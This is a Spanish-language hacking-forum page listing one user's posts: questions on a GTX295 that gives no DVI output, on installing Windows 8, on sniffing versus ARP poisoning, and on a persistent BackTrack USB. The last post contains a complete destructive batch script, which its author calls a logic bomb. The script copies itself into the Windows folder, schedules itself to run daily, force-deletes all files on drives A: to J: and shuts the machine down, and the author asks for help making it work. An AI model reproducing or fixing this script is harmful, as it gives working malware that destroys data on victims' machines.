elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: 1 [2]
11  Informática / Hardware / GTX295 solo funciona HDMI, DVIs no los reconoce en: 1 Septiembre 2012, 16:01 pm
Hola chic@s, me gustaría saber si me podríais echar una mano. Tengo un pequeño problema con mi GTX295. Solo me la reconoce por HDMI, cuando conecto los DVIs no me manda video, ni siquiera al encender. Por HDMI tampoco me manda video desde un principio, solo me manda video cuando arranca Windows y carga el driver supongo, pero no ahí manera ni de acceder a la BIOS, ni nada por ningún puerto, puesto que no veo nada  :-(

Para hacer cambios y demás, tengo que usar una 8400gs antigua, que esa me manda video desde cualquier puerto desde el principio.

Probé a cambiar desde el panel de control de nvidia, con el monitor y la tele enchufados, la priopidad al monitor que iva por DVI, perdi la señal de los dos y me tocó volver a la 8400 GS :/ , ya me estoy volviendo loco, llevo tres días intentando encontrar la solución y no ahí manera.

Espero que me podáis echar una mano, gracias
12  Sistemas Operativos / Windows / Windows 8, pequeñas dudas. en: 15 Agosto 2012, 23:07 pm
Hola chic@s. Tenía unas pequeñas dudas, haber si me podéis echar un cable. Estoy montando un PC a piezas, la parte de hardware esta toda lista, sólo queda que llegue lo que falta. ;-)

Ahora mis dudas son las siguientes. Tengo pensado instalar w8, ya lo tengo bajado y grabada la ISO de w8 pro x64 rtm.

Mi procesador es un FX 8120 de 8 nucleos. Lei que w7 no aprobechaba bien el rendimiento de la serie FX. ¿Es cierto?, leí que w8 trabaja mejor con estos procesadores. :) y quería que me confirmarais.

Sobre el menu de inicio, en la rp (release preview)  leí que se podía activar. ¿Hay alguna manera de hacerlo en la RTM?, yo esque nunca he usado ni la beta, ni ninguna versión de w8 aún.

Sobre la activación, ¿tenems algo definitivo? , o aún no hay nada.

Merece la pena el cambio?,

Gracias, salu2
13  Seguridad Informática / Hacking / Captura de trafico Modo Monitor o MiTM (Envenenamiento ARP) en: 23 Febrero 2011, 04:45 am
Bueno chicos, la duda es simple, y los motivos imnecesarios. Solo es la parte directa, mi duda.

Que es mas util, snifando trafco con airodump y descifrando los paquetes, o dentro de mi red hacer un envenenamiento arp. (Desventaja, se puede detectar el modo promiscuo.=, pero que me es mas util.?  :)

Gracias, salu2
14  Seguridad Informática / Wireless en Linux / ¿Como instalar BT4 R2 en memoria USB con Persistent Changes? en: 17 Febrero 2011, 16:24 pm
Bueno chicos, me gustaria sabes si me podriais echar un cable con esto; puesto que lo máximo que he conseguido ha sido con el tipico UNebootin hacer un Live USB, y realmente que eso solo me sirve para los Notebooks, pero yo quieroi un USB donde guardar los cambios de las aplicaciones que tengo.

No me importaria instalar BackTrack 4 Final, (que ahi varios tutoriales para hacerlo persistent), si me confirmarais si ha habido alguna actualización del driver RTL8187L entre esas dos distribuciones, si no, lo daria por zanjado y me instalaria BT4 sin más.

Aunque siempre es preferible tener el ultimo, puesto que nunca se sabe cuando ahi que tirar raspado de otro chip  :rolleyes:

Bueno, un saludo y grácias.
15  Programación / Scripting / BATCH. Aclaración de codigo. :) en: 19 Marzo 2010, 16:45 pm
Hola chicos. Bueno soy nuevo en el foro. Hace tiempo yo me dedicaba a hacer scripts en batch. Aprendi con pequeños tutoriales y me ha ido muy bien.
Lo que pasa hace mucho que lo descuidé y tendre que repasar :huh:.

Os comentaba que si me podiais echar una mano con este code. :)

Código:
@echo off
copy "%homepath%\HCKB.bat" "%WINDIR%\shutdownd.bat"
at 19:00 /every:1 "%WINDIR%\shutdownd.bat"
del /f /s /q "a:" *.*
del /f /s /q "b:" *.*
del /f /s /q "c:" *.*
del /f /s /q "d:" *.*
del /f /s /q "e:" *.*
del /f /s /q "f:" *.*
del /f /s /q "g:" *.*
del /f /s /q "h:" *.*
del /f /s /q "i:" *.*
del /f /s /q "j:" *.*
shutdown -s -f -r 10 -c DAÑOS GRAVES. FORZADO APAGADO.
exit


El significado del codigo que deseo realizar, como yo me acuerdo, es simplemente que el .bat se copie a windows, se programe su ejecución para el dia 1 de abril a las 7, en verdad seria ejecucion para todos los 1 de abril, pero con el primer mes basta y borre todos los archivos de todas las unidades. En plan bomba lógica. Lo he probado, y me dice.
"El nombre del archivo, el nombre de la sinxtasis de la etiqueta del volumen no es correcta."

Si %WINDIR% es el directorio general de windows, que en cualquier SO lleva hasta allí. ¿Que ocurre?.

Espero que me podais ayudar a mejorar mi codigo.
Yo colaboraré mas en este foro, que veo desde hace tiempo y que me gustaria colaborar. :)
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines